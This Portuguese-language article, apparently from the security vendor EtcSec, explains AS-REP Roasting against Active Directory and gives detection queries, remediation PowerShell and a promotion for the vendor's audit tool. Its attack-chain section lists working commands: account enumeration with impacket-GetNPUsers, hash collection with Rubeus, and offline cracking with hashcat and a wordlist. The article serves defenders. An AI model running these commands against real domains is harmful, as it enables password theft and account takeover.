O que e AS-REP Roasting?
O AS-REP Roasting e um ataque do Active Directory que visa contas com a pre-autenticacao Kerberos desabilitada. Qualquer atacante, mesmo sem credenciais, pode solicitar uma resposta AS-REP para essas contas e receber um blob cifrado com o hash de sua senha, pronto para ser crackeado offline.
Ao contrario do Kerberoasting, o AS-REP Roasting nao requer nenhuma credencial se o atacante tiver acesso de rede ao dominio. E um dos ataques de menor friccao no Active Directory.
A vulnerabilidade vem de uma opcao do Kerberos chamada DONT_REQUIRE_PREAUTH. Quando habilitada, o KDC ignora a etapa de pre-autenticacao e emite diretamente uma AS-REP com dados cifrados com o hash da conta.
⚠️ Diferenca principal do Kerberoasting: O Kerberoasting requer uma conta de dominio valida. O AS-REP Roasting pode ser realizado sem nenhuma credencial, de fora do dominio.
Como Funciona
No Kerberos padrao, antes de emitir um TGT, o cliente deve provar que conhece a senha enviando um timestamp cifrado. Isso impede a coleta de hashes offline.
Quando DONT_REQUIRE_PREAUTH esta definido, essa etapa e ignorada. O KDC responde a qualquer AS-REQ para essa conta com uma AS-REP contendo uma chave de sessao cifrada com o hash NTLM da conta, sem nenhuma prova de identidade.
A Cadeia de Ataque
Etapa 1 - Enumerar Contas Vulneraveis
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth, PasswordLastSet |
Select-Object SamAccountName, PasswordLastSet
# Sem credenciais
impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.0.1
# Com conta de dominio
impacket-GetNPUsers corp.local/user:password -request -dc-ip 10.10.0.1
Etapa 2 - Coletar Hashes AS-REP
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
Etapa 3 - Crackear Offline
# Modo 18200 para hashes AS-REP
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt --rules-file best64.rule
Etapa 4 - Tomada de Controle da Conta
Um hash AS-REP crackeado fornece a senha em texto claro da conta. O atacante pode autenticar-se como esse usuario e usar a conta como pivo para outros ataques.
Deteccao
Event IDs do Windows
| Event ID | Fonte | O que observar |
|---|---|---|
| 4768 | DC - Security | AS-REQ com Pre-Authentication Type: 0 — pre-autenticacao nao fornecida |
| 4768 | DC - Security | Multiplas AS-REQ para diferentes contas da mesma IP |
💡 Dica: Um unico evento 4768 com tipo de pre-auth 0 para uma conta que normalmente o exige e um alerta de alta confianca.
Consulta SIEM (Elastic KQL)
event.code: "4768" AND
winlog.event_data.PreAuthType: "0" AND
winlog.event_data.Status: "0x0"
Remediacao
💡 Acao Rapida: Reative a pre-autenticacao em todas as contas que a tem desabilitada. E uma correcao de uma linha por conta, sem impacto para o usuario na maioria dos casos.
Reativar a Pre-Autenticacao
# Conta individual
Set-ADAccountControl -Identity vulnerable_user -DoesNotRequirePreAuth $false
# Correcao em massa
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | ForEach-Object {
Set-ADAccountControl -Identity $_ -DoesNotRequirePreAuth $false
Write-Host "Corrigido: $($_.SamAccountName)"
}
Auditar e Reforcar
- Identificar todas as contas vulneraveis:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties PasswordLastSet, Description |
Select-Object SamAccountName, PasswordLastSet, Description |
Export-Csv contas_vulneraveis_asrep.csv -NoTypeInformation
- Rotacionar senhas das contas afetadas — mesmo apos reativar a pre-autenticacao.
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Set-ADUser -ChangePasswordAtLogon $true
- Restringir acesso LDAP anonimo para evitar enumeracao nao autenticada do flag.
Como o EtcSec Detecta Isso
O EtcSec sinaliza contas com pre-autenticacao Kerberos desabilitada em cada auditoria AD.
A deteccao ASREP_ROASTING_RISK identifica todas as contas com DONT_REQUIRE_PREAUTH definido, independentemente de ja terem sido atacadas.
Verificacoes relacionadas:
- PASSWORD_NEVER_EXPIRES - contas com pre-autenticacao desabilitada e senhas que nunca expiram sao uma superficie de ataque permanente
- PASSWORD_POLICY_WEAK - politica fraca torna o cracking mais rapido e provavel
- WEAK_KERBEROS_POLICY - configuracoes permissivas ampliam a janela de exploracao
ℹ️ Nota: O EtcSec verifica automaticamente essas vulnerabilidades em cada auditoria AD. Execute uma auditoria gratuita para identificar as contas expostas ao AS-REP Roasting.

